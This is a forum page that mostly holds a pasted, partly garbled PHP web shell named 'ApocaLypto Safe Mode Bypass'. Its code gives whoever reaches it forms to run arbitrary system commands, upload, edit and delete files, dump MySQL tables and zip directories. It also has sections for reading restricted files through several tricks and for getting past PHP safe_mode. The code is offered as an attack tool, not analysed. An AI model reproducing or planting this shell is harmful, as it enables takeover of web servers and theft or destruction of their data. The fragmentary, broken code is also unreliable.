Forum
Topics
Posts
Last Post
Book Circle
General Chat
* ApocaLypto *
ApocaLypto Safe Mode Bypass For WoLtaj.oRg
»??? URL ?????§°?
Mohajer'den al?narak editlenmistir
";
exit;
}
if (empty($_POST['command'] ) ) {
}ELSE{
if (substr(PHP_OS, 0, 3) == 'WIN') {
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe";
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "\n";
}
$tb = new FORMS;
$tb->tableheader();
$tb->tdbody(''.$_SERVER['HTTP_HOST'].' '.$mohajer.' '.$_SERVER['REMOTE_ADDR'].'
','center','top');
$tb->tdbody("");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('command [ system , shell_exec , passthru , Wscript.Shell , exec , popen ]
','center','top');
$tb->tdbody('');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'cmd: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
echo"
";
exit;
}//end shell
if ($_POST['editfile']){
$fp = fopen($_POST['editfile'], "r");
$filearr = file($_POST['editfile']);
foreach ($filearr as $string){
$content = $content . $string;
}
echo "Edit file: $editfile
Successfully saved!
PHPINFO() " : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | " : "";
$tb = new FORMS;
$tb->tableheader();
$tb->tdbody(' '.$_SERVER['HTTP_HOST'].' '.$mohajer.' '.$_SERVER['REMOTE_ADDR'].'
','center','top');
$tb->tdbody("");
$tb->tablefooter();
$tb->tableheader();
$tb->tdbody('Dosya Duzenle Yada Olustur & Dosya Yukle & Dizin Olustur
','center','top');
$tb->tdbody('');
$tb->headerform(array('content'=>'Dosya Duzenle weya Olustur: '.$tb->makehidden('dir', getcwd() ).' '.$tb->makeinput('editfile').' '.$tb->makeinput('Edit','Duzenle','','submit')));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'Dosya Yukle: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','Ekle','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('content'=>'Dizin Olustur: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','yenidizin','','submit')));
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'cmd: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
$tb->tdbody ("
");
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
$tb->tableheader();
echo"DIR First data Last data Size Perm \n";
echo " [$file \n";
echo " $ctime $mtime <dir> $dirperm \n";
$dir_i++;
} else {
if($file=="..") {
echo "\n";
echo " Up dir \n";
}
}
}
}// while
@closedir($dirs);
echo"
\n";
}// end dir
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
return (@rmdir($deldir)) ? 1 : 0;
}
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
}
return implode('/', $mainpath_info);
}
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return "No";
break;
case 1:
return "Yes";
break;
default:
return $result;
break;
}
}
function getfun($funName) {
return (false !== function_exists($funName)) ? "Yes" : "No";
}
class PHPZip{
var $out='';
function PHPZip($dir) {
if (@function_exists('gzcompress')) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//??????±?
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, "r");
$content = @fread ($fd, filesize ($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
}
return 1;
}
else return 0;
}
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if($file!='.' && $file!='..'){
$f=$dir .'/'. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}
closedir($dh);
}
}
return $a;
}
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
} // end if
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0) {
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode('', $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file() {
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function sqldumptable($table, $fp=0) {
$tabledump = "DROP TABLE IF EXISTS $table;\n";
$tabledump .= "CREATE TABLE $table (\n";
$firstfield=1;
$fields = mysql_query("SHOW FIELDS FROM $table");
while ($field = mysql_fetch_array($fields)) {
if (!$firstfield) {
$tabledump .= ",\n";
} else {
$firstfield=0;
}
$tabledump .= " $field[Field] $field[Type]";
if (!empty($field["Default"])) {
$tabledump .= " DEFAULT '$field[Default]'";
}
if ($field['Null'] != "YES") {
$tabledump .= " NOT NULL";
}
if ($field['Extra'] != "") {
$tabledump .= " $field[Extra]";
}
}
mysql_free_result($fields);
$keys = mysql_query("SHOW KEYS FROM $table");
while ($key = mysql_fetch_array($keys)) {
$kname=$key['Key_name'];
if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
$kname="UNIQUE|$kname";
}
if(!is_array($index[$kname])) {
$index[$kname] = array();
}
$index[$kname][] = $key['Column_name'];
}
mysql_free_result($keys);
while(list($kname, $columns) = @each($index)) {
$tabledump .= ",\n";
$colnames=implode($columns,",");
if ($kname == "PRIMARY") {
$tabledump .= " PRIMARY KEY ($colnames)";
} else {
if (substr($kname,0,6) == "UNIQUE") {
$kname=substr($kname,7);
}
$tabledump .= " KEY $kname ($colnames)";
}
}
$tabledump .= "\n);\n\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
$rows = mysql_query("SELECT * FROM $table");
$numfields = mysql_num_fields($rows);
while ($row = mysql_fetch_array($rows)) {
$tabledump = "INSERT INTO $table VALUES(";
$fieldcounter=-1;
$firstfield=1;
while (++$fieldcounter<$numfields) {
if (!$firstfield) {
$tabledump.=", ";
} else {
$firstfield=0;
}
if (!isset($row[$fieldcounter])) {
$tabledump .= "NULL";
} else {
$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
}
}
$tabledump .= ");\n";
if ($fp) {
fwrite($fp,$tabledump);
} else {
echo $tabledump;
}
}
mysql_free_result($rows);
}
class FORMS {
function tableheader() {
echo "\n";
}
function headerform($arg=array()) {
global $dir;
if ($arg[enctype]){
$enctype="enctype=\"$arg[enctype]\"";
} else {
$enctype="";
}
if (!isset($arg[method])) {
$arg[method] = "POST";
}
if (!isset($arg[action])) {
$arg[action] = '';
}
echo " \n";
}
function tdheader($title) {
global $dir;
echo " \n";
echo " ".$title." [·mohajer ] \n";
}
function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
if ($bgcolor=='2') {
$css="secondalt";
} elseif ($bgcolor=='1') {
$css="firstalt";
} else {
$css=$bgcolor;
}
$height = empty($height) ? "" : " height=".$height;
$colspan = empty($colspan) ? "" : " colspan=".$colspan;
echo " \n";
echo " ".$content." \n";
echo " \n";
}
function tablefooter() {
echo "
\n";
}
function formheader($action='',$title,$target='') {
global $dir;
$target = empty($target) ? "" : " target=\"".$target."\"";
echo " \n";
echo $end = empty($over) ? "" : "
\n";
}
function makeselect($arg = array()){
if ($arg[multiple]==1) {
$multiple = " multiple";
if ($arg[size]>0) {
$size = "size=$arg[size]";
}
}
if ($arg[css]==0) {
$css = "class=\"input\"";
}
$select = "\n";
if (is_array($arg[option])) {
foreach ($arg[option] AS $key=>$value) {
if (!is_array($arg[selected])) {
if ($arg[selected]==$key) {
$select .= "$value \n";
} else {
$select .= "$value \n";
}
} elseif (is_array($arg[selected])) {
if ($arg[selected][$key]==1) {
$select .= "$value \n";
} else {
$select .= "$value \n";
}
}
}
}
$select .= " \n";
return $select;
}
}
$tb->tableheader();
$tb->tdbody('Exploit: read file [SQL , id , CURL , copy , ini_restore , imap] & Make file ERORR
','center','top');
$tb->tdbody('');
$tb->headerform(array('content'=>'read file : read file id: read file CURL: read file copy: read file ini_restore: read file or dir with imap: Make file ERORR: Exploit: error_log() By * ApocaLypto *
", 3,$ERORR);
}
// id //
if ($_POST['plugin'] ){
echo "read file id" ," Sorry... File
".htmlspecialchars($u1p)." dosen't exists or you don't have
access. ");
}
}
/// ini_restore //
if(empty($_POST['M2'])){
} else {
echo "read file ini_restore","
");
// open dir //
$tb->tableheader();
$tb->tdbody('','center','top');
$tb->tdbody('');
if(empty($_POST['m'])){
echo "";
} else {
$m=$_POST['m'];
$spath = $m ;
$path = $m ;
$method = intval(trim($_POST['method']));
$handle = opendir($path);
$_folders = array();
$i = 0;
while (false !== ($file = readdir($handle)))
{
$full_path = "$path/$file";
$perms = substr(sprintf('%o', fileperms($full_path)), -4);
if ((is_dir($full_path)) && ($perms == '0777'))
{
if (!file_exists('.*')) {
$_folders[$i] = $file;
$i++;
}
}
}
closedir($handle);
clearstatcache();
echo 'The folders is 777 : The folders is 755 : The folders is 644 : The folders is 750 : The folders is 604 : The folders is 705 : The folders is 606 : The folders is 703 : Www.WoLtaj.oRg
");
$tb->tableheader();
$tb->tdbody('Exploit: break fucking safe-mode
','center','top');
$tb->tdbody('');
error_reporting(E_WARNING);
ini_set("display_errors", 1);
echo "".getcwd()." ";
echo "";
// break fucking safe-mode !
$root = "/";
if($_POST['root']) $root = $_POST['root'];
if (!ini_get('safe_mode')) die("Safe-mode is OFF. ");
echo "";
$tb->tdbody ("
");
?>
49 1658 Thu Jul 14, 2005 2:17 pmDon The Anvil
Forum Index" vspace="1" />
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
